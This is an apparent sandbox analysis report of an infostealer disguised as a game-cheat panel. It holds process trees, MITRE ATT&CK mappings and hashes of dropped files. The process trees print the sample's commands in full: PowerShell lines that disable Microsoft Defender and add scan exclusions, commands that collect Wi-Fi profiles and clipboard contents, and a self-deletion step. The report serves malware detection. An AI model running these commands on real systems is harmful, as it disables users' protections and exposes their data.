C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\bd-xiters-painel\" -spe -an -ai#7zMap32419:94:7zEvent25907
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3728

C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe
"C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe"
1⤵
- Executes dropped EXE
PID:4008
- C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe
  "C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    PID:3416
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
    3⤵
    PID:4404
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:4200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    PID:3976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3780
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    PID:1984
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe""
    3⤵
    PID:3944
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:996

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\bd-xiters-painel\" -spe -an -ai#7zMap12103:94:7zEvent22882
1⤵
- Suspicious use of FindShellTrayWindow
PID:4204

C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe
"C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe"
1⤵
- Executes dropped EXE
PID:4452
- C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe
  "C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3532

C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe
"C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe"
1⤵
- Executes dropped EXE
PID:224
- C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe
  "C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    PID:2432
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
    3⤵
    PID:408
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:3308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    PID:1948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4732
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4932
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    PID:1244
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe""
    3⤵
    PID:2352
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
210676dde5c0bd984dc057e2333e1075

SHA1
2d2f8c14ee48a2580f852db7ac605f81b5b1399a

SHA256
2a89d71b4ddd34734b16d91ebd8ea68b760f321baccdd4963f91b8d3507a3fb5

SHA512
aeb81804cac5b17a5d1e55327f62df7645e9bbbfa8cad1401e7382628341a939b7aedc749b2412c06174a9e3fcdd5248d6df9b5d3f56c53232d17e59277ab017

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f4e6521c03f1bc16d91d99c059cc5424

SHA1
043665051c486192a6eefe6d0632cf34ae8e89ad

SHA256
7759c346539367b2f80e78abca170f09731caa169e3462f11eda84c3f1ca63d1

SHA512
0bb4f628da6d715910161439685052409be54435e192cb4105191472bb14a33724592df24686d1655e9ba9572bd3dff8f46e211c0310e16bfe2ac949c49fbc5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
919c7b7dad73d758cd59b528dbbd2f8b

SHA1
20746607abb1740b2e3e7ee5d91dbd4bf77dd6f7

SHA256
c51b5b8d64714273f3d00b246ae22cc6596350e6c31ba033eaa36b1a831e0b8b

SHA512
be4dd9364de7faa4c0abe5ab79b1970fca9683067c4003f6b011617d02ca8641b1c7eb3002a16e7734a41a67d3f50b2af044df4dd38f7b2b9d1402c635cbf9c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
166c816891234b5b508da45f88dbeba4

SHA1
78784d108275fd74fcda9bf9923a710efad45f14

SHA256
4889001f5f615d30de6508daa4dd36b658c8a88b49fb65d862d7b62f8c6aa1a8

SHA512
7cbcf3a3fedd16f78c626c0d833fed8cb9eada9a985de9aa46f423a00801b85904053c6491a405f4732f0f5a5e1be968df02ca6187e6a0baac4f014ba16e22c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e11dcda70668869aeba0749a8539f535

SHA1
80aff62bc46bbaaa47c82d392f0bc8e28e36b02c

SHA256
322f03263e132e00f681b58cf9bf2c2976d6a19ee676b37f087f90717fb47887

SHA512
fbe8d14d960d39f750ebabb4226096769a5eef95d11cce41c036fc17aa3b548f77d884f49b8016463821e4f44c4722320098ae3c72b4728275e425a6d3e10aea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
aa09e91f0b037578a4399dc0171fcdc6

SHA1
211596862be717b025e337a66ace10f8fc2b66e5

SHA256
ef2118046df82c22030087d1fa99343af0b3ef4f730dcdf689abc53f4696fd94

SHA512
17556a268e814ee4012fff5f480e9e56108fd504867d8be2dd1d3c29efdff272dd235c64402a06d338f19eee5c03324b5bb47984e4b7d3e4e4809f825a782d0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\VCRUNTIME140_1.dll

Filesize
48KB

MD5
f8dfa78045620cf8a732e67d1b1eb53d

SHA1
ff9a604d8c99405bfdbbf4295825d3fcbc792704

SHA256
a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

SHA512
ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_asyncio.pyd

Filesize
37KB

MD5
0804be29acc07bd44c75e4f163324fbc

SHA1
089da0ca9ce6262adccd2dbcea8fcabd88855b16

SHA256
0ef71f1da6e1a335f8c109097a6ed0837374bc94ae411028b1bcb7a7cc93782d

SHA512
72d3f56a3b81e2afa113496631803a49ea1b34e232a12a4235fd5f94de6cba7f044cf4debc2cde86605e6884088f093e171dc621687ba093957c28e55c1ae51c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_bz2.pyd

Filesize
48KB

MD5
129b8fc28878df7dd42d36ff1de949f4

SHA1
ab685c12de234a3711e33a0347ab8746b56d04a1

SHA256
c82142b10865733a3356443c9eaede39361c0e0149095a8bc80da2a32284e94e

SHA512
75c384b412297beb7d584974453b115ac48969df54f6fed50d49ca6a093dd39df71a4b7173c5114189482f00ee5730846c87f4098896e3b19d89fc49ab89440b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_cffi_backend.cp312-win_amd64.pyd

Filesize
71KB

MD5
886da52cb1d06bd17acbd5c29355a3f5

SHA1
45dee87aefb1300ec51f612c3b2a204874be6f28

SHA256
770d04ebe9f4d8271659ba9bf186b8ae422fdd76f7293dbc84be78d9d6dd92cc

SHA512
d6c7a90b8fa017f72f499943d73e4015f2eec0e46188c27848892a99be35e0ecbda1f692630863b89109b04636e813ddad2051f323a24b4d373192a6b67cf978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_ctypes.pyd

Filesize
59KB

MD5
f77112b03d93c75d14407caac66b81ae

SHA1
35313b3e1d21ee0b1e2b5e268ed5e615cf7bb648

SHA256
ef944c313816d1029eb296bdc950be1c3bb3923ec47303ba16881d698d9b7487

SHA512
53856072e1707104304e76f2c49c625e869cfe054f1cf7ecfacd65111c527c03926d00eb9032de3e8593b99afce1acdc38fea50f24e6f232b7071f0875a90e36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_decimal.pyd

Filesize
107KB

MD5
329e367463d76f99dcfed4b0d7edd185

SHA1
b1abae4d3eeef0e65badf97e2b0f9cab7afb2e8c

SHA256
377938b7ba53fde435dac2ed036944c83bce86b887e9823d0829a80e3b05b521

SHA512
f5452788e4c5dfe4f285e7b6c7816c86c9c0f7361c80da43874c5ea3f6b06a602038d98f58832b264ffe913d2c624b4e4f436563d478948b86447ec8b0374d98

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_hashlib.pyd

Filesize
35KB

MD5
713da0d19fc604bdeddb4df28357100e

SHA1
7723e44f9428a98edba0f81d34a52b0cdd0621dd

SHA256
d547701d97277dded245c623e8a7228091eb7d55e5b97019e90a61f342ee73a5

SHA512
35da15a7feccee4cc08efb7906ed033ff8620fedddfb3c72183c5bb0db8fb94bc0937aae49e261cdea8475c21cec3b1b0264a5181739228e513f740300258117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_lzma.pyd

Filesize
86KB

MD5
ff86441eaaf167ba4ea9ae351cce375f

SHA1
b3555d1a9fd7581a71e8ae5b81d768498fd4b4c4

SHA256
a8f5f82e2d8bb63d1c151170d3c09749f2ba708c8dc34a46cbbaa4496143d183

SHA512
875ff725231792428fbfcd3006caa63aa40e28641a0c8ada687fd6a6280990efbabcb37195b03c472fbf1991c73b1553ecbaee6247fa66c212ac7ce2df158169

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_multiprocessing.pyd

Filesize
27KB

MD5
e973438eeb322cd99df186c13018cc71

SHA1
74078c8b2bc626a699f3e7fe4d6f1190664a73a7

SHA256
45738f26326208280b2f124f3d3a9fe7db71ef42e51e5e6a0a4b8c68a93ad128

SHA512
6586279a0b4bb7a2744c2c361f12a16da0cea6014dc2f8e735762d72a6afacc1ba3effab05c9589d5cc5c28e47bc095be90f0313dca5eaff0bf39f409f171cff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_overlapped.pyd

Filesize
33KB

MD5
dc6899285f711fe3c184267fd71dd800

SHA1
c77fca163fa4dd0ae7aff58b0f1dd9ffe9fbaf62

SHA256
796ec1ce77a6a6ff88cf5357e99fdefa973aa95c637d6f1d80f7216ae19f58ff

SHA512
55eb628f31c750c523b790512ba7f04c166c609f1f4f23e79e467f9770d9590017a1ee7ef39e315cb3de7b80e4e27feaeac1f839e2d622fb308ca79e0e452726

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_queue.pyd

Filesize
26KB

MD5
e71e5b92c3cf88a77f77580365cf085d

SHA1
75eceb0c8d7eb6c9e69104865a243351acef197d

SHA256
e27df0606db097d0109bed73efd9e3a534934976977b0b1f5367ca3bfa920b34

SHA512
1a909dcb3495cba647b5c52e69eaf274cb3b48ba4289c21e8b7dc1fbb8f72794b7eeae65d1cb92aec6f51879473c9e6c23c6babe542ac9207efac3d071e3981e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_socket.pyd

Filesize
44KB

MD5
4255f8879f83118f203d5b584a5d3387

SHA1
ce3d9b537fc18f1e28d508f1cdb2a7e3569aedbf

SHA256
c4973b6cba669c8dc73958969f0efc651129636574438667d59d58afa5d59fda

SHA512
280ea44372f423c17e56fbbb7d3c2105c0aab0764c3f2b18f625bf9292b456ca5a52ef413fd41d8c621001be4a867ea810e6cc35e649f97bfa84cc2b66835a3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_sqlite3.pyd

Filesize
57KB

MD5
4e68a22b0bf6499690769db30728601e

SHA1
a2a53f49caee3c5c24b5d32c5eaf32184e381272

SHA256
aeb7ca654becd736d9b5be061a82ab8f9632707cfc0f520228c53c257020bf0f

SHA512
7b104486ece00ae610459287987ab66d1504f4e06e41c7609a7b8963512b522b127f197c748db5168c8d19d3d6f53616ce99bbe69fc54184eafb053ad333db9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_ssl.pyd

Filesize
66KB

MD5
c369f5ef562e7f34d9498abbd0bd5a28

SHA1
4ecfebe2551c7700a7f6d78b6ac8540912df1c1f

SHA256
9039540639c0a2fc093058e440fd8d490f7c58b50f8b400e0b1e3ba05d92ff85

SHA512
be6cdf8ae96a9ebd0638ff52cb278355fd025404b9daff5f9dc062defde3c3fd6f6e19bdb9450e4c5cbcb008be41981e52237bead9a1539b5b448530b4f941b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_uuid.pyd

Filesize
25KB

MD5
50521b577719195d7618a23b3103d8aa

SHA1
7020d2e107000eaf0eddde74bc3809df2c638e22

SHA256
acbf831004fb8b8d5340fe5debd9814c49bd282dd765c78faeb6bb5116288c78

SHA512
4ee950da8bbbd36932b488ec62fa046ac8fc35783a146edadbe063b8419a63d4dfb5bbd8c45e9e008fe708e6fc4a1fee1202fce92ffc95320547ba714fed95e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\_wmi.pyd

Filesize
28KB

MD5
43aca36b3de2707b1dad7500000c854e

SHA1
1fb3ecbb9dbc0f154ab654c49ee38e98955380c4

SHA256
73c8c3a50a142085dc7a612c24a68079e8e7a7796e3b3ca08388ad0ed7af866f

SHA512
e57a84e34336793c124e823d9a88d521ed9a834e417d3206c22c09fbb33f02d67f9566344b9264b985417d917f576ce067ef712afa862591e1bba94e9e2bb0ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\base_library.zip

Filesize
1.3MB

MD5
43935f81d0c08e8ab1dfe88d65af86d8

SHA1
abb6eae98264ee4209b81996c956a010ecf9159b

SHA256
c611943f0aeb3292d049437cb03500cc2f8d12f23faf55e644bca82f43679bc0

SHA512
06a9dcd310aa538664b08f817ec1c6cfa3f748810d76559c46878ea90796804904d41ac79535c7f63114df34c0e5de6d0452bb30df54b77118d925f21cfa1955

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\libcrypto-3.dll

Filesize
1.6MB

MD5
e68a459f00b05b0bd7eafe3da4744aa9

SHA1
41565d2cc2daedd148eeae0c57acd385a6a74254

SHA256
3fcf6956df6f5dc92b2519062b40475b94786184388540a0353f8a0868413648

SHA512
6c4f3747af7be340a3db91e906b949684a39cafc07f42b9fcc27116f4f4bf405583fc0db3684312b277d000d8e6a566db2c43601fa2af499700319c660ef1108

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\libffi-8.dll

Filesize
29KB

MD5
bb1feaa818eba7757ada3d06f5c57557

SHA1
f2de5f06dc6884166de165d34ef2b029bb0acf8b

SHA256
a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29

SHA512
95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\libssl-3.dll

Filesize
222KB

MD5
9b8d3341e1866178f8cecf3d5a416ac8

SHA1
8f2725b78795237568905f1a9cd763a001826e86

SHA256
85dd8c17928e78c20cf915c1985659fe99088239793f2bd46acb31a3c344c559

SHA512
815abc0517f94982fc402480bba6e0749f44150765e7f8975e4fcbfce62c4a5ff741e39e462d66b64ba3b804bd5b7190b67fff037d11bb314c7d581cfa6097a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\pyexpat.pyd

Filesize
88KB

MD5
83639619f4a2d8882e7531856d4c5f0c

SHA1
3c2c32dda79676a49da6643766b039ff6146dbc6

SHA256
507abf44f6ad7b90bdb5f395f61857f3f76f2f872e713c82e5731db6505c680e

SHA512
a590a17e9984373e2f0bc8964228cffccc52e31cd5809f27ebc9990e66a0b3a3a8f8b7f18050cfdadf99e160314fe494e8dd227e93e36f17469dafcc042c03ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\python3.DLL

Filesize
66KB

MD5
a07661c5fad97379cf6d00332999d22c

SHA1
dca65816a049b3cce5c4354c3819fef54c6299b0

SHA256
5146005c36455e7ede4b8ecc0dc6f6fa8ea6b4a99fedbabc1994ae27dfab9d1b

SHA512
6ddeb9d89ccb4d2ec5d994d85a55e5e2cc7af745056dae030ab8d72ee7830f672003f4675b6040f123fc64c19e9b48cabd0da78101774dafacf74a88fbd74b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\python312.dll

Filesize
1.7MB

MD5
bb66c1a07ce73f87ca4cdf2549218b9f

SHA1
d8cb078ccf0e5f1e7031a2750121c5d429c2c196

SHA256
e8a71df356d95efeefd9d120e280f0ced5e96ba2f5c9b87d08345eaa95513925

SHA512
4c694436e5bb3eca6a40bfd6e2f198cae357dcf1898d1cd5f6bb1757acdf44066581cce987d984997c3777ed72913c6171071b0bae55e1760e3f5d5dc6cea9ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\select.pyd

Filesize
25KB

MD5
baf053d825beb79b06a6a0ad56736671

SHA1
0382a984b2d3608c2fcec12b94d467bb5001a6d6

SHA256
97c3dbe9b72c09f81aa72d9e688a677d96f8bca22e11588c471db28316cb0984

SHA512
58219582729adc7d67b48942255efee434424d6115d448c6260c2d2cdea28f571585f1ecb2b237e27df2b4a85e90eca82a60b774767ee5ac72bd29f3cbddc3d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\sqlite3.dll

Filesize
644KB

MD5
3c8e927b32ccec923ac63d4cb46c1030

SHA1
d06452b2f9d37a460530129c622668e4843c58ff

SHA256
d946156a80d0f16f385821b59a97b76809209bdd1eb14587d360549b050ab803

SHA512
1a4d8e4bf45a02c61051745cb0fe2449da480f2a9d4389ffeb2d92f9384f90280f33d05cae24c2879fd1c79392c08eb6a13c67568c7851b2f755bc2ee4bf7732

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40082\unicodedata.pyd

Filesize
295KB

MD5
896d8ec4f85e50e7a5a4bbf8185d19d0

SHA1
9d605b703e3af6de4b941494ce979472bbbd43d8

SHA256
71112f32cfcfa18d5ac16bacd2c00385b5deaf6d20819f3286234b7ca95b5d2f

SHA512
b2101fc6846acb5d3aebbb05d2c141c2debc2a32a14fb846c6ea19a5908235c630733c55e904ec34f504140f4c222ad6ba5c3a15c2c5d54608f3b02ee21e30e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5yaiqvo.pxm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a6S7n3iEev\Browser\cc's.txt

Filesize
91B

MD5
5aa796b6950a92a226cc5c98ed1c47e8

SHA1
6706a4082fc2c141272122f1ca424a446506c44d

SHA256
c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c

SHA512
976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\a6S7n3iEev\Browser\history.txt

Filesize
23B

MD5
5638715e9aaa8d3f45999ec395e18e77

SHA1
4e3dc4a1123edddf06d92575a033b42a662fe4ad

SHA256
4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6

SHA512
78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

Download Submit
